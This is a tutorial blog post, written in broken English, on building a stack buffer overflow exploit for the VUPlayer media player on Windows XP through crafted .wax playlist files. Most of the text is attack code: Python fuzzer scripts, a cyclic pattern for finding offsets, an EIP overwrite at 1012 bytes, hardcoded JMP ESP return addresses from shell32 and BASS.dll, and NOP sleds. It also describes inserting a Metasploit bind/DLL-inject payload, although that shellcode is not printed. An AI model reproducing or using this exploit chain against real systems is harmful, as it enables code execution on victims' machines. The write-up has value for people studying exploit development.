Buffer Overflow VUPlayer with direct return(Part 3)

tool used : 1. VUPlayer

                  2. Ollydbg and install ollydbg in victim and  tool BT(terminator)

                   3. Windows XP

                  4. Pattern_Create

                  5. Metasploit Framework

                  6.Patter_Offset
(With SHELL32)
first we need to know information contained in the application we seek.
There are several ways to find information from the target application.
able to type file which are in file-->open playlist there you can see there are six file type this is: (.pls, .m3u, .asx, .vpl, .wax, .cue) and can also through File --- > add File there are many several types of files among others ( MIDI File, MPEG audio file) Attack patterns are still many more we can do with the application

 here I use a pattern of attack by open playlist from file.I tried one by one type of the file apparently there are some type file not crush that is (.asx, .vpl, .cue),
warning BASS,BASSWMA,BASSMIDI when my first run application VUPlayer on Ollydbg i don't why is that??

drag and drup file with name sasuke in VUPlayar and application VUPlayer not crush.
example my script :
sikamaru = "\x41" * 1500
f=open("sasuke.cue","w")
f.write(sikamaru)
f.close
below type file is not type file movie or music, but can also script which my write not suitable for type file said.
I was wrong, instead of can not crush,can crush oringin value more than 900000 but EIP and ESP not change

 the results application no crush but appear sasuke.vpl such as image below

all Payload from Metasploit Framework for fuzzer above can not crush,but if type file the following can crush

but if using other then type files it crush(.pls, .m3u, .wax). i try changing a flow script above with change type file i make bold, as the example below:

sikamaru = "\x41" * 1500
f=open("sasuke.wax","w")
f.write(sikamaru)
f.close

 My place value below 1500 application not crush but if I place value above 1500 then application can crush
fulther we write order pattern_create use to fill the memory with kakasi.txt order below :

my script is :
sikamaru ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"
f=open("sasuke.wax","w")
f.write(sikamaru)
f.close
and output from ollydbg is:

then we test with use ./Pattern_Offset and value EIP is :

do the some thing as above for search value ESP is :

then we change the value EIP of our own. my script is :
sikamaru = "\x90" * 1012
sikamaru+= "\xDB\xEF\xDE\xAD"
f=open("sasuke.wax","w")
f.write(sikamaru)
f.close
and we see the EIP from Ollydbg is the same as we make :

then we running return and see is it affected the value of registers to be CCCC, my script is :
sikamaru = "\x90" * 1012
sikamaru+= "\xDB\xEF\xDE\xAD"
sikamaru+= "\x90" * (1016-len(sikamaru))
sikamaru+= "\xCC" * (1500-len(sikamaru))
f=open("sasuke.wax","w")
f.write(sikamaru)
f.close
and display the output is:

then we search the registry of the JMP ESP from shell32 then we replace some script above

example my script is:
sikamaru = "\x90" * 1012
sikamaru+= "\xDB\xB3\xA4\x7C"
sikamaru+= "\x90" * 32
f=open("sasuke.wax","w")
f.write(sikamaru)
f.close
and output from ollydbg is :

now we insert script in exploit into fuzzer we make.
order the calling :
firsh we running apache and mysql in advance then we running msfweb how with :

then we open browser and write http://127.0.0.1:21345 looks is :

and we click generate payload and looks :

we editing script fuzzer with manner:

we running fuzzer but we open VUPlayer before we running fuzzer

first step as above :
we try a different way use BASS.dll instead of shell32 for search JMP ESP.

EIP same result as above output is :

my script is :
sikamaru = "\x90" * 1012
sikamaru+= "\xFF\xD0\x00\x10"
sikamaru+= "\x90" * 32
f=open("sasuke.wax","w")
f.write(sikamaru)
f.close

Now we input payload Bind DLL Inject from Metasploit Framework
my Script:

we close application Ollydbg and VUPlayer and run more application VUPlayer and we running fuzzer.
sricpt Payload Firsh used can not and application VUPlayer

immediately closed.

I will insert Payload two

and running fuzzer and application VUPlayer will display the command